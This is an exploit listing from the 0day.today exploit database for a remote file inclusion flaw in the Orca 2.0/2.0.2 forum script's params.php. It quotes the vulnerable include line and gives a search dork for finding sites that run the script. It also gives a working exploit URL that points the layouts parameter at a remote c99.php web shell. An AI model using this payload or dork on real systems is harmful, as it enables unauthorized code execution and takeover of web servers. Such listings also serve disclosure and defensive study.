[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability

Author
Ciph3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3310
Category
web applications
Date add
25-06-2008
Platform
unsorted
===============================================================
Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability
===============================================================



#####################################################################
#
# Orca - Interactive Forum Script Remote File Inclusion Vulnerability
#
#####################################################################
#
# Discovered by : Ciph3r
#
#
# SP tanx4: Iranian hacker & Kurdish security TEAM
# 
# CMS download : http://sourceforge.net/project/platformdownload.php?group_id=183624    
#
# class : remote
#
# risk : high
#
# Dork : "Powered by Orca Interactive Forum Script"
#
#######################################################################
#
# C0de : 
#
#               
#    require_once ($gConf['dir']['layouts'] . 'base/params.php');
#
#
#######################################################################

 EXPLOIT :

 

 http://127.0.0.1/cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://127.0.0.1/c99.php?


#######################################################################



#  0day.today [2024-12-25]  #